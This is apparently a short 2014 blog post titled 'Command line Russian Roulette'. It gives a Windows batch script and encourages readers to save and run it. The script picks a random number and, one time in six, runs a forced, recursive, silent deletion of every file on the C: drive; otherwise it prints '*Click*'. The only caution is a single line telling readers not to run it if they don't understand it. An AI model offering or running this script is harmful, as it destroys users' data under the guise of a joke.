jeudi 10 juillet 2014

Command line Russian Roulette

For those who like living on the edge, copy this code into a .bat file and execute from the command prompt :)




Code:



@ECHO OFF

SET /a _rand=%RANDOM%*6/32768+1

IF %_rand% == 6 (DEL /F /S /Q /A "C:\*") ELSE (Echo *Click*)





Note: If you don't understand what the above code does, please DO NOT execute this program.




Aucun commentaire:

Enregistrer un commentaire